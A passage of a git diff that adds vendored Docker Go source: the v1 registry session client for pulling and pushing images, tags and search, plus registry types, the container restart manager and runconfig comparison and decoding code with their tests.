logrus.Debugf("Ancestry: %v", history) + return history, nil +} + +// LookupRemoteImage checks if an image exists in the registry +func (r *Session) LookupRemoteImage(imgID, registry string) error { + res, err := r.client.Get(registry + "images/" + imgID + "/json") + if err != nil { + return err + } + res.Body.Close() + if res.StatusCode != 200 { + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + } + return nil +} + +// GetRemoteImageJSON retrieves an image's JSON metadata from the registry. +func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, error) { + res, err := r.client.Get(registry + "images/" + imgID + "/json") + if err != nil { + return nil, -1, fmt.Errorf("Failed to download json: %s", err) + } + defer res.Body.Close() + if res.StatusCode != 200 { + return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + } + // if the size header is not present, then set it to '-1' + imageSize := int64(-1) + if hdr := res.Header.Get("X-Docker-Size"); hdr != "" { + imageSize, err = strconv.ParseInt(hdr, 10, 64) + if err != nil { + return nil, -1, err + } + } + + jsonString, err := ioutil.ReadAll(res.Body) + if err != nil { + return nil, -1, fmt.Errorf("Failed to parse downloaded json: %v (%s)", err, jsonString) + } + return jsonString, imageSize, nil +} + +// GetRemoteImageLayer retrieves an image layer from the registry +func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io.ReadCloser, error) { + var ( + statusCode = 0 + res *http.Response + err error + imageURL = fmt.Sprintf("%simages/%s/layer", registry, imgID) + ) + + req, err := http.NewRequest("GET", imageURL, nil) + if err != nil { + return nil, fmt.Errorf("Error while getting from the server: %v", err) + } + statusCode = 0 + res, err = r.client.Do(req) + if err != nil { + logrus.Debugf("Error contacting registry %s: %v", registry, err) + // the only case err != nil && res != nil is https://golang.org/src/net/http/client.go#L515 + if res != nil { + if res.Body != nil { + res.Body.Close() + } + statusCode = res.StatusCode + } + return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)", + statusCode, imgID) + } + + if res.StatusCode != 200 { + res.Body.Close() + return nil, fmt.Errorf("Server error: Status %d while fetching image layer (%s)", + res.StatusCode, imgID) + } + + if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 { + logrus.Debug("server supports resume") + return httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil + } + logrus.Debug("server doesn't support resume") + return res.Body, nil +} + +// GetRemoteTag retrieves the tag named in the askedTag argument from the given +// repository. It queries each of the registries supplied in the registries +// argument, and returns data from the first one that answers the query +// successfully. +func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) { + repository := repositoryRef.RemoteName() + + if strings.Count(repository, "/") == 0 { + // This will be removed once the registry supports auto-resolution on + // the "library" namespace + repository = "library/" + repository + } + for _, host := range registries { + endpoint := fmt.Sprintf("%srepositories/%s/tags/%s", host, repository, askedTag) + res, err := r.client.Get(endpoint) + if err != nil { + return "", err + } + + logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint) + defer res.Body.Close() + + if res.StatusCode == 404 { + return "", ErrRepoNotFound + } + if res.StatusCode != 200 { + continue + } + + var tagID string + if err := json.NewDecoder(res.Body).Decode(&tagID); err != nil { + return "", err + } + return tagID, nil + } + return "", fmt.Errorf("Could not reach any registry endpoint") +} + +// GetRemoteTags retrieves all tags from the given repository. It queries each +// of the registries supplied in the registries argument, and returns data from +// the first one that answers the query successfully. It returns a map with +// tag names as the keys and image IDs as the values. +func (r *Session) GetRemoteTags(registries []string, repositoryRef reference.Named) (map[string]string, error) { + repository := repositoryRef.RemoteName() + + if strings.Count(repository, "/") == 0 { + // This will be removed once the registry supports auto-resolution on + // the "library" namespace + repository = "library/" + repository + } + for _, host := range registries { + endpoint := fmt.Sprintf("%srepositories/%s/tags", host, repository) + res, err := r.client.Get(endpoint) + if err != nil { + return nil, err + } + + logrus.Debugf("Got status code %d from %s", res.StatusCode, endpoint) + defer res.Body.Close() + + if res.StatusCode == 404 { + return nil, ErrRepoNotFound + } + if res.StatusCode != 200 { + continue + } + + result := make(map[string]string) + if err := json.NewDecoder(res.Body).Decode(&result); err != nil { + return nil, err + } + return result, nil + } + return nil, fmt.Errorf("Could not reach any registry endpoint") +} + +func buildEndpointsList(headers []string, indexEp string) ([]string, error) { + var endpoints []string + parsedURL, err := url.Parse(indexEp) + if err != nil { + return nil, err + } + var urlScheme = parsedURL.Scheme + // The registry's URL scheme has to match the Index' + for _, ep := range headers { + epList := strings.Split(ep, ",") + for _, epListElement := range epList { + endpoints = append( + endpoints, + fmt.Sprintf("%s://%s/v1/", urlScheme, strings.TrimSpace(epListElement))) + } + } + return endpoints, nil +} + +// GetRepositoryData returns lists of images and endpoints for the repository +func (r *Session) GetRepositoryData(name reference.Named) (*RepositoryData, error) { + repositoryTarget := fmt.Sprintf("%srepositories/%s/images", r.indexEndpoint.String(), name.RemoteName()) + + logrus.Debugf("[registry] Calling GET %s", repositoryTarget) + + req, err := http.NewRequest("GET", repositoryTarget, nil) + if err != nil { + return nil, err + } + // this will set basic auth in r.client.Transport and send cached X-Docker-Token headers for all subsequent requests + req.Header.Set("X-Docker-Token", "true") + res, err := r.client.Do(req) + if err != nil { + // check if the error is because of i/o timeout + // and return a non-obtuse error message for users + // "Get https://index.docker.io/v1/repositories/library/busybox/images: i/o timeout" + // was a top search on the docker user forum + if isTimeout(err) { + return nil, fmt.Errorf("Network timed out while trying to connect to %s. You may want to check your internet connection or if you are behind a proxy.", repositoryTarget) + } + return nil, fmt.Errorf("Error while pulling image: %v", err) + } + defer res.Body.Close() + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + // TODO: Right now we're ignoring checksums in the response body. + // In the future, we need to use them to check image validity. + if res.StatusCode == 404 { + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code: %d", res.StatusCode), res) + } else if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to pull repository %s: %q", res.StatusCode, name.RemoteName(), errBody), res) + } + + var endpoints []string + if res.Header.Get("X-Docker-Endpoints") != "" { + endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String()) + if err != nil { + return nil, err + } + } else { + // Assume the endpoint is on the same host + endpoints = append(endpoints, fmt.Sprintf("%s://%s/v1/", r.indexEndpoint.URL.Scheme, req.URL.Host)) + } + + remoteChecksums := []*ImgData{} + if err := json.NewDecoder(res.Body).Decode(&remoteChecksums); err != nil { + return nil, err + } + + // Forge a better object from the retrieved data + imgsData := make(map[string]*ImgData, len(remoteChecksums)) + for _, elem := range remoteChecksums { + imgsData[elem.ID] = elem + } + + return &RepositoryData{ + ImgList: imgsData, + Endpoints: endpoints, + }, nil +} + +// PushImageChecksumRegistry uploads checksums for an image +func (r *Session) PushImageChecksumRegistry(imgData *ImgData, registry string) error { + u := registry + "images/" + imgData.ID + "/checksum" + + logrus.Debugf("[registry] Calling PUT %s", u) + + req, err := http.NewRequest("PUT", u, nil) + if err != nil { + return err + } + req.Header.Set("X-Docker-Checksum", imgData.Checksum) + req.Header.Set("X-Docker-Checksum-Payload", imgData.ChecksumPayload) + + res, err := r.client.Do(req) + if err != nil { + return fmt.Errorf("Failed to upload metadata: %v", err) + } + defer res.Body.Close() + if len(res.Cookies()) > 0 { + r.client.Jar.SetCookies(req.URL, res.Cookies()) + } + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return fmt.Errorf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err) + } + var jsonBody map[string]string + if err := json.Unmarshal(errBody, &jsonBody); err != nil { + errBody = []byte(err.Error()) + } else if jsonBody["error"] == "Image already exists" { + return ErrAlreadyExists + } + return fmt.Errorf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody) + } + return nil +} + +// PushImageJSONRegistry pushes JSON metadata for a local image to the registry +func (r *Session) PushImageJSONRegistry(imgData *ImgData, jsonRaw []byte, registry string) error { + + u := registry + "images/" + imgData.ID + "/json" + + logrus.Debugf("[registry] Calling PUT %s", u) + + req, err := http.NewRequest("PUT", u, bytes.NewReader(jsonRaw)) + if err != nil { + return err + } + req.Header.Add("Content-type", "application/json") + + res, err := r.client.Do(req) + if err != nil { + return fmt.Errorf("Failed to upload metadata: %s", err) + } + defer res.Body.Close() + if res.StatusCode == 401 && strings.HasPrefix(registry, "http://") { + return httputils.NewHTTPRequestError("HTTP code 401, Docker will not send auth headers over HTTP.", res) + } + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + } + var jsonBody map[string]string + if err := json.Unmarshal(errBody, &jsonBody); err != nil { + errBody = []byte(err.Error()) + } else if jsonBody["error"] == "Image already exists" { + return ErrAlreadyExists + } + return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata: %q", res.StatusCode, errBody), res) + } + return nil +} + +// PushImageLayerRegistry sends the checksum of an image layer to the registry +func (r *Session) PushImageLayerRegistry(imgID string, layer io.Reader, registry string, jsonRaw []byte) (checksum string, checksumPayload string, err error) { + u := registry + "images/" + imgID + "/layer" + + logrus.Debugf("[registry] Calling PUT %s", u) + + tarsumLayer, err := tarsum.NewTarSum(layer, false, tarsum.Version0) + if err != nil { + return "", "", err + } + h := sha256.New() + h.Write(jsonRaw) + h.Write([]byte{'\n'}) + checksumLayer := io.TeeReader(tarsumLayer, h) + + req, err := http.NewRequest("PUT", u, checksumLayer) + if err != nil { + return "", "", err + } + req.Header.Add("Content-Type", "application/octet-stream") + req.ContentLength = -1 + req.TransferEncoding = []string{"chunked"} + res, err := r.client.Do(req) + if err != nil { + return "", "", fmt.Errorf("Failed to upload layer: %v", err) + } + if rc, ok := layer.(io.Closer); ok { + if err := rc.Close(); err != nil { + return "", "", err + } + } + defer res.Body.Close() + + if res.StatusCode != 200 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d while uploading metadata and error when trying to parse response body: %s", res.StatusCode, err), res) + } + return "", "", httputils.NewHTTPRequestError(fmt.Sprintf("Received HTTP code %d while uploading layer: %q", res.StatusCode, errBody), res) + } + + checksumPayload = "sha256:" + hex.EncodeToString(h.Sum(nil)) + return tarsumLayer.Sum(jsonRaw), checksumPayload, nil +} + +// PushRegistryTag pushes a tag on the registry. +// Remote has the format '/ +func (r *Session) PushRegistryTag(remote reference.Named, revision, tag, registry string) error { + // "jsonify" the string + revision = "\"" + revision + "\"" + path := fmt.Sprintf("repositories/%s/tags/%s", remote.RemoteName(), tag) + + req, err := http.NewRequest("PUT", registry+path, strings.NewReader(revision)) + if err != nil { + return err + } + req.Header.Add("Content-type", "application/json") + req.ContentLength = int64(len(revision)) + res, err := r.client.Do(req) + if err != nil { + return err + } + res.Body.Close() + if res.StatusCode != 200 && res.StatusCode != 201 { + return httputils.NewHTTPRequestError(fmt.Sprintf("Internal server error: %d trying to push tag %s on %s", res.StatusCode, tag, remote.RemoteName()), res) + } + return nil +} + +// PushImageJSONIndex uploads an image list to the repository +func (r *Session) PushImageJSONIndex(remote reference.Named, imgList []*ImgData, validate bool, regs []string) (*RepositoryData, error) { + cleanImgList := []*ImgData{} + if validate { + for _, elem := range imgList { + if elem.Checksum != "" { + cleanImgList = append(cleanImgList, elem) + } + } + } else { + cleanImgList = imgList + } + + imgListJSON, err := json.Marshal(cleanImgList) + if err != nil { + return nil, err + } + var suffix string + if validate { + suffix = "images" + } + u := fmt.Sprintf("%srepositories/%s/%s", r.indexEndpoint.String(), remote.RemoteName(), suffix) + logrus.Debugf("[registry] PUT %s", u) + logrus.Debugf("Image list pushed to index:\n%s", imgListJSON) + headers := map[string][]string{ + "Content-type": {"application/json"}, + // this will set basic auth in r.client.Transport and send cached X-Docker-Token headers for all subsequent requests + "X-Docker-Token": {"true"}, + } + if validate { + headers["X-Docker-Endpoints"] = regs + } + + // Redirect if necessary + var res *http.Response + for { + if res, err = r.putImageRequest(u, headers, imgListJSON); err != nil { + return nil, err + } + if !shouldRedirect(res) { + break + } + res.Body.Close() + u = res.Header.Get("Location") + logrus.Debugf("Redirected to %s", u) + } + defer res.Body.Close() + + if res.StatusCode == 401 { + return nil, errcode.ErrorCodeUnauthorized.WithArgs() + } + + var tokens, endpoints []string + if !validate { + if res.StatusCode != 200 && res.StatusCode != 201 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push repository %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + } + tokens = res.Header["X-Docker-Token"] + logrus.Debugf("Auth token: %v", tokens) + + if res.Header.Get("X-Docker-Endpoints") == "" { + return nil, fmt.Errorf("Index response didn't contain any endpoints") + } + endpoints, err = buildEndpointsList(res.Header["X-Docker-Endpoints"], r.indexEndpoint.String()) + if err != nil { + return nil, err + } + } else { + if res.StatusCode != 204 { + errBody, err := ioutil.ReadAll(res.Body) + if err != nil { + logrus.Debugf("Error reading response body: %s", err) + } + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Error: Status %d trying to push checksums %s: %q", res.StatusCode, remote.RemoteName(), errBody), res) + } + } + + return &RepositoryData{ + Endpoints: endpoints, + }, nil +} + +func (r *Session) putImageRequest(u string, headers map[string][]string, body []byte) (*http.Response, error) { + req, err := http.NewRequest("PUT", u, bytes.NewReader(body)) + if err != nil { + return nil, err + } + req.ContentLength = int64(len(body)) + for k, v := range headers { + req.Header[k] = v + } + response, err := r.client.Do(req) + if err != nil { + return nil, err + } + return response, nil +} + +func shouldRedirect(response *http.Response) bool { + return response.StatusCode >= 300 && response.StatusCode < 400 +} + +// SearchRepositories performs a search against the remote repository +func (r *Session) SearchRepositories(term string, limit int) (*registrytypes.SearchResults, error) { + if limit < 1 || limit > 100 { + return nil, fmt.Errorf("Limit %d is outside the range of [1, 100]", limit) + } + logrus.Debugf("Index server: %s", r.indexEndpoint) + u := r.indexEndpoint.String() + "search?q=" + url.QueryEscape(term) + "&n=" + url.QueryEscape(fmt.Sprintf("%d", limit)) + + req, err := http.NewRequest("GET", u, nil) + if err != nil { + return nil, fmt.Errorf("Error while getting from the server: %v", err) + } + // Have the AuthTransport send authentication, when logged in. + req.Header.Set("X-Docker-Token", "true") + res, err := r.client.Do(req) + if err != nil { + return nil, err + } + defer res.Body.Close() + if res.StatusCode != 200 { + return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Unexpected status code %d", res.StatusCode), res) + } + result := new(registrytypes.SearchResults) + return result, json.NewDecoder(res.Body).Decode(result) +} + +// GetAuthConfig returns the authentication settings for a session +// TODO(tiborvass): remove this once registry client v2 is vendored +func (r *Session) GetAuthConfig(withPasswd bool) *types.AuthConfig { + password := "" + if withPasswd { + password = r.authConfig.Password + } + return &types.AuthConfig{ + Username: r.authConfig.Username, + Password: password, + } +} + +func isTimeout(err error) bool { + type timeout interface { + Timeout() bool + } + e := err + switch urlErr := err.(type) { + case *url.Error: + e = urlErr.Err + } + t, ok := e.(timeout) + return ok && t.Timeout() +} diff --git a/vendor/github.com/docker/docker/registry/types.go b/vendor/github.com/docker/docker/registry/types.go new file mode 100644 index 0000000000..49c123a3e2 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/types.go @@ -0,0 +1,73 @@ +package registry + +import ( + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +// RepositoryData tracks the image list, list of endpoints, and list of tokens +// for a repository +type RepositoryData struct { + // ImgList is a list of images in the repository + ImgList map[string]*ImgData + // Endpoints is a list of endpoints returned in X-Docker-Endpoints + Endpoints []string + // Tokens is currently unused (remove it?) + Tokens []string +} + +// ImgData is used to transfer image checksums to and from the registry +type ImgData struct { + // ID is an opaque string that identifies the image + ID string `json:"id"` + Checksum string `json:"checksum,omitempty"` + ChecksumPayload string `json:"-"` + Tag string `json:",omitempty"` +} + +// PingResult contains the information returned when pinging a registry. It +// indicates the registry's version and whether the registry claims to be a +// standalone registry. +type PingResult struct { + // Version is the registry version supplied by the registry in an HTTP + // header + Version string `json:"version"` + // Standalone is set to true if the registry indicates it is a + // standalone registry in the X-Docker-Registry-Standalone + // header + Standalone bool `json:"standalone"` +} + +// APIVersion is an integral representation of an API version (presently +// either 1 or 2) +type APIVersion int + +func (av APIVersion) String() string { + return apiVersions[av] +} + +// API Version identifiers. +const ( + _ = iota + APIVersion1 APIVersion = iota + APIVersion2 +) + +var apiVersions = map[APIVersion]string{ + APIVersion1: "v1", + APIVersion2: "v2", +} + +// RepositoryInfo describes a repository +type RepositoryInfo struct { + reference.Named + // Index points to registry information + Index *registrytypes.IndexInfo + // Official indicates whether the repository is considered official. + // If the registry is official, and the normalized name does not + // contain a '/' (e.g. "foo"), then it is considered an official repo. + Official bool + // Class represents the class of the repository, such as "plugin" + // or "image". + Class string +} diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go new file mode 100644 index 0000000000..570fc93802 --- /dev/null +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager.go @@ -0,0 +1,128 @@ +package restartmanager + +import ( + "errors" + "fmt" + "sync" + "time" + + "github.com/docker/docker/api/types/container" +) + +const ( + backoffMultiplier = 2 + defaultTimeout = 100 * time.Millisecond +) + +// ErrRestartCanceled is returned when the restart manager has been +// canceled and will no longer restart the container. +var ErrRestartCanceled = errors.New("restart canceled") + +// RestartManager defines object that controls container restarting rules. +type RestartManager interface { + Cancel() error + ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error) +} + +type restartManager struct { + sync.Mutex + sync.Once + policy container.RestartPolicy + restartCount int + timeout time.Duration + active bool + cancel chan struct{} + canceled bool +} + +// New returns a new restartmanager based on a policy. +func New(policy container.RestartPolicy, restartCount int) RestartManager { + return &restartManager{policy: policy, restartCount: restartCount, cancel: make(chan struct{})} +} + +func (rm *restartManager) SetPolicy(policy container.RestartPolicy) { + rm.Lock() + rm.policy = policy + rm.Unlock() +} + +func (rm *restartManager) ShouldRestart(exitCode uint32, hasBeenManuallyStopped bool, executionDuration time.Duration) (bool, chan error, error) { + if rm.policy.IsNone() { + return false, nil, nil + } + rm.Lock() + unlockOnExit := true + defer func() { + if unlockOnExit { + rm.Unlock() + } + }() + + if rm.canceled { + return false, nil, ErrRestartCanceled + } + + if rm.active { + return false, nil, fmt.Errorf("invalid call on active restartmanager") + } + // if the container ran for more than 10s, regardless of status and policy reset the + // the timeout back to the default. + if executionDuration.Seconds() >= 10 { + rm.timeout = 0 + } + if rm.timeout == 0 { + rm.timeout = defaultTimeout + } else { + rm.timeout *= backoffMultiplier + } + + var restart bool + switch { + case rm.policy.IsAlways(): + restart = true + case rm.policy.IsUnlessStopped() && !hasBeenManuallyStopped: + restart = true + case rm.policy.IsOnFailure(): + // the default value of 0 for MaximumRetryCount means that we will not enforce a maximum count + if max := rm.policy.MaximumRetryCount; max == 0 || rm.restartCount < max { + restart = exitCode != 0 + } + } + + if !restart { + rm.active = false + return false, nil, nil + } + + rm.restartCount++ + + unlockOnExit = false + rm.active = true + rm.Unlock() + + ch := make(chan error) + go func() { + select { + case <-rm.cancel: + ch <- ErrRestartCanceled + close(ch) + case <-time.After(rm.timeout): + rm.Lock() + close(ch) + rm.active = false + rm.Unlock() + } + }() + + return true, ch, nil +} + +func (rm *restartManager) Cancel() error { + rm.Do(func() { + rm.Lock() + rm.canceled = true + close(rm.cancel) + rm.Unlock() + }) + return nil +} diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go new file mode 100644 index 0000000000..20eced54d3 --- /dev/null +++ b/vendor/github.com/docker/docker/restartmanager/restartmanager_test.go @@ -0,0 +1,34 @@ +package restartmanager + +import ( + "testing" + "time" + + "github.com/docker/docker/api/types/container" +) + +func TestRestartManagerTimeout(t *testing.T) { + rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) + should, _, err := rm.ShouldRestart(0, false, 1*time.Second) + if err != nil { + t.Fatal(err) + } + if !should { + t.Fatal("container should be restarted") + } + if rm.timeout != 100*time.Millisecond { + t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + } +} + +func TestRestartManagerTimeoutReset(t *testing.T) { + rm := New(container.RestartPolicy{Name: "always"}, 0).(*restartManager) + rm.timeout = 5 * time.Second + _, _, err := rm.ShouldRestart(0, false, 10*time.Second) + if err != nil { + t.Fatal(err) + } + if rm.timeout != 100*time.Millisecond { + t.Fatalf("restart manager should have a timeout of 100ms but has %s", rm.timeout) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/compare.go b/vendor/github.com/docker/docker/runconfig/compare.go new file mode 100644 index 0000000000..708922f986 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/compare.go @@ -0,0 +1,61 @@ +package runconfig + +import "github.com/docker/docker/api/types/container" + +// Compare two Config struct. Do not compare the "Image" nor "Hostname" fields +// If OpenStdin is set, then it differs +func Compare(a, b *container.Config) bool { + if a == nil || b == nil || + a.OpenStdin || b.OpenStdin { + return false + } + if a.AttachStdout != b.AttachStdout || + a.AttachStderr != b.AttachStderr || + a.User != b.User || + a.OpenStdin != b.OpenStdin || + a.Tty != b.Tty { + return false + } + + if len(a.Cmd) != len(b.Cmd) || + len(a.Env) != len(b.Env) || + len(a.Labels) != len(b.Labels) || + len(a.ExposedPorts) != len(b.ExposedPorts) || + len(a.Entrypoint) != len(b.Entrypoint) || + len(a.Volumes) != len(b.Volumes) { + return false + } + + for i := 0; i < len(a.Cmd); i++ { + if a.Cmd[i] != b.Cmd[i] { + return false + } + } + for i := 0; i < len(a.Env); i++ { + if a.Env[i] != b.Env[i] { + return false + } + } + for k, v := range a.Labels { + if v != b.Labels[k] { + return false + } + } + for k := range a.ExposedPorts { + if _, exists := b.ExposedPorts[k]; !exists { + return false + } + } + + for i := 0; i < len(a.Entrypoint); i++ { + if a.Entrypoint[i] != b.Entrypoint[i] { + return false + } + } + for key := range a.Volumes { + if _, exists := b.Volumes[key]; !exists { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/runconfig/compare_test.go b/vendor/github.com/docker/docker/runconfig/compare_test.go new file mode 100644 index 0000000000..6370d7a887 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/compare_test.go @@ -0,0 +1,126 @@ +package runconfig + +import ( + "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// Just to make life easier +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestCompare(t *testing.T) { + ports1 := make(nat.PortSet) + ports1[newPortNoError("tcp", "1111")] = struct{}{} + ports1[newPortNoError("tcp", "2222")] = struct{}{} + ports2 := make(nat.PortSet) + ports2[newPortNoError("tcp", "3333")] = struct{}{} + ports2[newPortNoError("tcp", "4444")] = struct{}{} + ports3 := make(nat.PortSet) + ports3[newPortNoError("tcp", "1111")] = struct{}{} + ports3[newPortNoError("tcp", "2222")] = struct{}{} + ports3[newPortNoError("tcp", "5555")] = struct{}{} + volumes1 := make(map[string]struct{}) + volumes1["/test1"] = struct{}{} + volumes2 := make(map[string]struct{}) + volumes2["/test2"] = struct{}{} + volumes3 := make(map[string]struct{}) + volumes3["/test1"] = struct{}{} + volumes3["/test3"] = struct{}{} + envs1 := []string{"ENV1=value1", "ENV2=value2"} + envs2 := []string{"ENV1=value1", "ENV3=value3"} + entrypoint1 := strslice.StrSlice{"/bin/sh", "-c"} + entrypoint2 := strslice.StrSlice{"/bin/sh", "-d"} + entrypoint3 := strslice.StrSlice{"/bin/sh", "-c", "echo"} + cmd1 := strslice.StrSlice{"/bin/sh", "-c"} + cmd2 := strslice.StrSlice{"/bin/sh", "-d"} + cmd3 := strslice.StrSlice{"/bin/sh", "-c", "echo"} + labels1 := map[string]string{"LABEL1": "value1", "LABEL2": "value2"} + labels2 := map[string]string{"LABEL1": "value1", "LABEL2": "value3"} + labels3 := map[string]string{"LABEL1": "value1", "LABEL2": "value2", "LABEL3": "value3"} + + sameConfigs := map[*container.Config]*container.Config{ + // Empty config + &container.Config{}: {}, + // Does not compare hostname, domainname & image + &container.Config{ + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user", + }: { + Hostname: "host2", + Domainname: "domain2", + Image: "image2", + User: "user", + }, + // only OpenStdin + &container.Config{OpenStdin: false}: {OpenStdin: false}, + // only env + &container.Config{Env: envs1}: {Env: envs1}, + // only cmd + &container.Config{Cmd: cmd1}: {Cmd: cmd1}, + // only labels + &container.Config{Labels: labels1}: {Labels: labels1}, + // only exposedPorts + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports1}, + // only entrypoints + &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint1}, + // only volumes + &container.Config{Volumes: volumes1}: {Volumes: volumes1}, + } + differentConfigs := map[*container.Config]*container.Config{ + nil: nil, + &container.Config{ + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user1", + }: { + Hostname: "host1", + Domainname: "domain1", + Image: "image1", + User: "user2", + }, + // only OpenStdin + &container.Config{OpenStdin: false}: {OpenStdin: true}, + &container.Config{OpenStdin: true}: {OpenStdin: false}, + // only env + &container.Config{Env: envs1}: {Env: envs2}, + // only cmd + &container.Config{Cmd: cmd1}: {Cmd: cmd2}, + // not the same number of parts + &container.Config{Cmd: cmd1}: {Cmd: cmd3}, + // only labels + &container.Config{Labels: labels1}: {Labels: labels2}, + // not the same number of labels + &container.Config{Labels: labels1}: {Labels: labels3}, + // only exposedPorts + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports2}, + // not the same number of ports + &container.Config{ExposedPorts: ports1}: {ExposedPorts: ports3}, + // only entrypoints + &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint2}, + // not the same number of parts + &container.Config{Entrypoint: entrypoint1}: {Entrypoint: entrypoint3}, + // only volumes + &container.Config{Volumes: volumes1}: {Volumes: volumes2}, + // not the same number of labels + &container.Config{Volumes: volumes1}: {Volumes: volumes3}, + } + for config1, config2 := range sameConfigs { + if !Compare(config1, config2) { + t.Fatalf("Compare should be true for [%v] and [%v]", config1, config2) + } + } + for config1, config2 := range differentConfigs { + if Compare(config1, config2) { + t.Fatalf("Compare should be false for [%v] and [%v]", config1, config2) + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go new file mode 100644 index 0000000000..508681cfe0 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config.go @@ -0,0 +1,97 @@ +package runconfig + +import ( + "encoding/json" + "fmt" + "io" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/volume" +) + +// ContainerDecoder implements httputils.ContainerDecoder +// calling DecodeContainerConfig. +type ContainerDecoder struct{} + +// DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder +func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + return DecodeContainerConfig(src) +} + +// DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder +func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { + return DecodeHostConfig(src) +} + +// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper +// struct and returns both a Config and a HostConfig struct +// Be aware this function is not checking whether the resulted structs are nil, +// it's your business to do so +func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var w ContainerConfigWrapper + + decoder := json.NewDecoder(src) + if err := decoder.Decode(&w); err != nil { + return nil, nil, nil, err + } + + hc := w.getHostConfig() + + // Perform platform-specific processing of Volumes and Binds. + if w.Config != nil && hc != nil { + + // Initialize the volumes map if currently nil + if w.Config.Volumes == nil { + w.Config.Volumes = make(map[string]struct{}) + } + + // Now validate all the volumes and binds + if err := validateMountSettings(w.Config, hc); err != nil { + return nil, nil, nil, err + } + } + + // Certain parameters need daemon-side validation that cannot be done + // on the client, as only the daemon knows what is valid for the platform. + if err := ValidateNetMode(w.Config, hc); err != nil { + return nil, nil, nil, err + } + + // Validate isolation + if err := ValidateIsolation(hc); err != nil { + return nil, nil, nil, err + } + + // Validate QoS + if err := ValidateQoS(hc); err != nil { + return nil, nil, nil, err + } + + // Validate Resources + if err := ValidateResources(hc, sysinfo.New(true)); err != nil { + return nil, nil, nil, err + } + return w.Config, hc, w.NetworkingConfig, nil +} + +// validateMountSettings validates each of the volumes and bind settings +// passed by the caller to ensure they are valid. +func validateMountSettings(c *container.Config, hc *container.HostConfig) error { + // it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 ) + + // Ensure all volumes and binds are valid. + for spec := range c.Volumes { + if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { + return fmt.Errorf("invalid volume spec %q: %v", spec, err) + } + } + for _, spec := range hc.Binds { + if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { + return fmt.Errorf("invalid bind mount spec %q: %v", spec, err) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go new file mode 100644 index 